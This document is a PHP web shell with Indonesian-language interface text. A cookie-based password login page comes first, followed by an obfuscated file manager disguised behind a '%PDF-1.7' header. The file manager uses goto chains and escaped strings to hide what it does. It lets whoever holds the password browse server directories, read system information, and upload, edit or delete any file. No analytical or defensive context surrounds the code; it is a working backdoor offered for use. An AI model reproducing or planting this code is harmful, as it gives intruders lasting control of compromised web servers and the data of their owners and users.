1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88

<?php
// Hash password tersimpan (gunakan hash yang kuat di aplikasi produksi)
$stored_password_hash = "9f93f9defd0c69e30b03b51f3dafdafb";

// Proses login
if (!isset($_COOKIE['loggedin'])) {
    if (isset($_POST['password'])) {
        $input_password_hash = md5($_POST['password']);
        
        if ($input_password_hash === $stored_password_hash) {
            // Set cookie untuk login
            setcookie('loggedin', true, time() + 360000, "/"); // Cookie berlaku selama 1 jam
            header("Location: " . $_SERVER['REQUEST_URI']);
            exit();
        } else {
            $error = "Password salah!";
        }
    }
}

// Bypass Litespeed
header("X-LiteSpeed-Purge: *");

// Jika pengguna belum login, tampilkan form login
if (!isset($_COOKIE['loggedin'])) {
    ?>
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Patrick+Hand&family=Playwrite+AR:wght@100..400&display=swap" rel="stylesheet">
        <title>Drago Manager- Masuk</title>
        <style>
            body { font-family: "Patrick Hand", cursive; font-weight: 400; font-style: normal; }
            .container { max-width: 320px; margin: 100px auto; padding: 20px; border: 1px solid #a5f3e7; border-radius: 10px; }
            .container input { width: 91%; padding: 10px; margin: 10px 0px; }
            .container button { width: 100%; padding: 12px; background-color: cyan; border: none; border-radius: 5px; cursor: pointer; }
            .container button:hover { background-color: #48c2af; }
            .error { color: red; }
        </style>
    </head>
    <body>
        <div class="container">
            <h2>Masuk Mas Heker Tampan</h2>
            <?php if (isset($error)) { echo '<p class="error">'.$error.'</p>'; } ?>
            <form method="post" action="">
                <input type="password" name="password" placeholder="Masukkan password Anda..." required>
                <button type="submit">Masuk</button>
            </form>
        </div>
    </body>
    </html>
    <?php
    exit; // Hentikan eksekusi lebih lanjut jika pengguna belum login
}
?>
AVRIL
%PDF-1.7<?php goto SlC3A;f07kr:$current_dir=realpath($dir);goto CWCJj;UGQdR:echo $uname;goto EXrU1;cQn8t:if(isset($_POST["\163\165\142\155\x69\x74\137\145\144\151\164"])){$file=$_POST["\145\x64\151\x74\x65\x64\137\146\x69\154\x65"];$content=$_POST["\146\151\x6c\145\x5f\x63\157\156\x74\x65\x6e\164"];if(file_put_contents($file,$content)!==false){$edit_message="\106\151\x6c\x65\40\142\145\x72\x68\x61\163\151\154\40\x64\151\x65\x64\151\x74\x2e";}else{$edit_message="\107\141\x67\x61\x6c\40\x6d\145\156\x67\x65\x64\151\164\40\x66\151\x6c\145\56";}}goto ktXTE;vxlhr:function get_file_permissions($file){return substr(sprintf("\45\x6f",fileperms($file)),-4);}goto u6c6i;SlC3A:$dir=isset($_GET["\x64\151\162"])?base64_decode($_GET["\144\151\x72"]):"\56";goto UfqEs;ktXTE:if(isset($_POST["\x64\145\154\145\164\145\x5f\146\x69\x6c\145"])){$file=$_POST["\144\x65\x6c\145\x74\x65\x5f\x66\151\154\145"];if(unlink($file)){$delete_message="\106\x69\154\x65\x20\142\145\x72\x68\141\163\151\154\40\144\x69\x68\x61\x70\x75\x73\56";}else{$delete_message="\x47\141\x67\x61\154\40\x6d\145\x6e\x67\150\141\160\165\x73\40\x66\151\x6c\x65\x2e";}}goto neYyE;EXrU1: ?>
</p><?php goto rrCGc;gAvDh:$delete_message='';goto vxlhr;YL5Xg:if(isset($_FILES["\146\x69\154\x65\x5f\165\x70\154\x6f\141\x64"])){if(move_uploaded_file($_FILES["\146\151\154\145\x5f\x75\x70\154\x6f\141\144"]["\164\155\160\x5f\x6e\x61\155\x65"],$dir."\x2f".$_FILES["\146\x69\154\x65\137\x75\x70\x6c\157\x61\144"]["\x6e\x61\155\x65"])){$upload_message="\x46\151\x6c\145\40\x62\x65\x72\x68\141\163\151\154\x20\144\x69\165\x6e\x67\x67\141\x68\x2e";}else{$upload_message="\x47\141\x67\x61\x6c\x20\x6d\145\156\x67\x75\x6e\147\147\141\x68\x20\x66\151\x6c\145\56";}}goto OZNfm;XESD7: ?>
"></form><table><tr><th>Filename</th><th>Permissions</th><th>Actions</th></tr><?php goto RaBDX;bgXW8:if(!empty($delete_message)){ ?>
<p><?php echo $delete_message; ?>
</p><?php }goto MyN_p;Js77u: ?>
</p><p>Server information:<?php goto UGQdR;z8rIF:echo base64_encode($dir);goto XESD7;u6c6i:function is_writable_permission($file){return is_writable($file);}goto YL5Xg;RaBDX:foreach($files as $file){ ?>
<tr><td><?php if(is_dir($dir."\x2f".$file)){ ?>
<a href="?dir=<?php echo base64_encode($dir."\57".$file); ?>
"style="color:<?php echo is_writable_permission($dir."\x2f".$file)?"\x69\156\150\145\162\151\164":"\x72\x65\144"; ?>
"><?php echo $file; ?>
</a><?php }else{ ?>
<span style="color:<?php echo is_writable_permission($dir."\x2f".$file)?"\151\156\150\145\x72\151\164":"\162\145\144"; ?>
"><?php echo $file; ?>
</span><?php } ?>
</td><td style="color:<?php echo is_writable_permission($dir."\57".$file)?"\147\162\145\x65\156":"\162\x65\x64"; ?>
"><?php echo is_file($dir."\x2f".$file)?get_file_permissions($dir."\x2f".$file):(is_writable_permission($dir."\x2f".$file)?"\x44\x69\x72\x65\143\164\x6f\x72\x79":"\104\x69\162\x65\x63\x74\x6f\162\171\x20\50\x4e\157\x20\167\x72\x69\164\141\142\x6c\145\x29"); ?>
</td><td><?php if(is_file($dir."\x2f".$file)){ ?>
<form method="post"action=""style="display:inline-block"><input type="hidden"name="edit_file"value="<?php echo $dir."\x2f".$file; ?>
"> <button class="btn btn-outline-light"type="submit">Edit</button></form><form method="post"action=""style="display:inline-block"><input type="hidden"name="delete_file"value="<?php echo $dir."\x2f".$file; ?>
"> <button class="btn btn-outline-light"type="submit">Delete</button></form><?php } ?>
</td></tr><?php }goto ObcyE;MyN_p: ?>
<form method="POST"enctype="multipart/form-data"><label>Upload file:</label> <input type="file"name="file_upload"> <input type="submit"value="Upload"> <input type="hidden"name="dir"value="<?php goto z8rIF;kskWj:$edit_message='';goto gAvDh;CWCJj: ?>
<!doctypehtml><html><head><title>SIMPEL BANGET NIH SHELL</title><style>body{font-family:Arial,sans-serif;margin:0;padding:0;text-align:center}header{background-color:#4caf50;color:#fff;padding:1rem}header h1{margin:0}main{padding:1rem}table{border-collapse:collapse;margin:1rem auto;width:50%}td,th{border:1px solid #ddd;padding:.5rem;text-align:left}th{background-color:#f2f2f2}tr:nth-child(even){background-color:#f2f2f2}tr:hover{background-color:#ddd}form{display:inline-block;margin:1rem 0}input[type=submit]{background-color:#4caf50;border:none;color:#fff;cursor:pointer;margin-left:1rem;padding:.5rem 1rem;text-align:center;text-decoration:none;display:inline-block;font-size:12px}input[type=submit]:hover{background-color:#45a049}</style></head><body><header><h1>SIMPEL BANGET NIH SHELL</h1></header><main><p>Current directory:<?php goto fHL5O;neYyE:$uname=php_uname();goto f07kr;t6nYd:$upload_message='';goto kskWj;UfqEs:$files=scandir($dir);goto t6nYd;fHL5O:echo $current_dir;goto Js77u;OZNfm:if(isset($_POST["\145\144\x69\x74\x5f\x66\151\x6c\145"])){$file=$_POST["\145\x64\151\x74\137\146\151\154\145"];$content=file_get_contents($file);if($content!==false){echo "\74\146\157\x72\155\40\x6d\x65\x74\x68\157\x64\x3d\42\160\157\x73\x74\42\40\141\x63\x74\x69\x6f\156\x3d\x22\42\x3e";echo "\x3c\x74\x65\170\x74\141\162\145\141\40\151\144\75\x22\x43\157\x70\x79\106\162\157\x6d\x54\x65\x78\164\101\x72\145\x61\42\40\x6e\141\x6d\x65\75\x22\x66\151\154\145\137\143\x6f\156\164\145\x6e\164\42\40\162\x6f\167\x73\75\42\x31\x30\x22\x20\x63\x6c\x61\163\163\75\42\x66\157\x72\155\55\143\x6f\156\x74\x72\157\154\x22\76".htmlspecialchars($content)."\74\57\x74\145\x78\x74\141\162\145\141\76";echo "\74\x69\156\x70\165\164\x20\164\x79\160\x65\x3d\42\x68\151\x64\x64\x65\156\x22\x20\156\141\x6d\145\x3d\42\145\x64\x69\164\x65\x64\137\146\151\154\x65\x22\x20\166\x61\154\x75\x65\75\x22".htmlspecialchars($file)."\x22\76";echo "\74\142\165\x74\164\157\x6e\x20\164\x79\x70\x65\x3d\x22\x73\x75\142\155\151\x74\42\x20\156\141\x6d\145\75\42\163\x75\x62\x6d\151\164\x5f\145\144\151\164\x22\40\143\154\x61\163\x73\75\x22\142\x74\x6e\x20\142\x74\156\x2d\x6f\165\x74\x6c\151\156\145\x2d\x6c\151\147\150\164\x22\x3e\123\165\142\155\151\x74\x3c\x2f\142\x75\164\x74\157\156\76";echo "\x3c\57\146\x6f\162\x6d\76";}else{$edit_message="\x47\x61\147\x61\154\x20\x6d\145\155\x62\141\x63\141\40\x69\163\x69\40\146\x69\154\145\x2e";}}goto cQn8t;rrCGc:if(!empty($upload_message)){ ?>
<p><?php echo $upload_message; ?>
</p><?php }goto jGpUr;jGpUr:if(!empty($edit_message)){ ?>
<p><?php echo $edit_message; ?>
</p><?php }goto bgXW8;ObcyE: ?>
</table></main></body></html>